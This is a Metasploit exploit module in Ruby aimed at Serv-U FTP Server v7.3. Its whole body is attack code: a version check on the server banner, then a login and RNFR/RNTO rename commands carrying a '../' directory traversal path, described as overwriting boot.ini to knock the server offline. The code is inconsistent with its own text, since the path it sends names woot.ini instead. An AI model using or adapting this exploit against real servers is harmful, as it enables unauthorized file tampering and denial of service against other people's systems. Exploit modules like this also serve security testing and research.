# Serv-U  FTPD directory traversal vulnerability in REN command
# Written by Thoufique

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Serv-U Directory Traversal vulnerability in REN command',
			'Description'    => %q{
				This is an exploit that overwrites boot.ini file DOS'ing the server. It uses
                                a directory traversal vulnerability in REN command.
			},
			'Author'         => [ 'Thoufique' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1$',
			'References'     =>
				[
					[ 'URL', 'http://www.milw0rm.com/exploits/6661'],
				],
			'Privileged'     => false,
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x75022ac4 }],
                                ],
                        'DisclosureDate' => 'Oct 01 2008',
			'DefaultTarget' => 0))
	end
	
	def check
		connect
		disconnect	
		if (banner =~ /Serv-U FTP Server v7.3 /)
                	return Exploit::CheckCode::Vulnerable
                end
                return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect_login
		print_status("Replacing boot.ini with directory traversal")
                file = 'replace.txt'
                target = '../../../../../woot.ini'
		print_status("Sending REN command with traversal")
                send_cmd(['RNFR', file], false)
                send_cmd(['RNTO', target], false)
		print_status("Done")
                disconnect
	end	
end